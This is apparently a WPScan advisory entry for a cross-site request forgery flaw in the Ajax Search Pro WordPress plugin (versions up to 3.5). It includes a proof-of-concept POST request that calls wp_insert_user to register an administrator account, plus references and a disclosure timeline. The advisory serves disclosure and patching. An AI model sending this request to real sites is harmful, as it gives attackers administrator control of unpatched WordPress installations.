Ajax Search Pro <= 3.5 - Cross-Site Request Forgery (CSRF) Add User



Proof of Concept
This will register an administrator with username "xADMIN" and password "xPASS":

POST request to: /wp-admin/admin-ajax.php?page=ajax-search-pro/backend/settings.php&action=wpdreams-ajaxinput

With POST data:
wpdreams_callback=wp_insert_user&user_login=xADMIN&user_pass=xPASS&role=administrator

Affects Plugin

fixed in version 4.0

References

PACKETSTORM 130955
URL http://web.archive.org/web/20150619084745/http://research.evex.pw/?vuln=9

Classification

Type CSRF
OWASP Top 10 A8: Cross-Site Request Forgery (CSRF)
CWE CWE-352

Miscellaneous

Submitter A. Samman
Submitter Twitter Evex_1337
Views 1211
Verified No
WPVDB ID 7859

Timeline

Publicly Published 2015-03-18 (over 3 years ago)
Added 2015-03-21 (over 3 years ago)
Last Updated 2016-12-01 (almost 2 years ago)

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.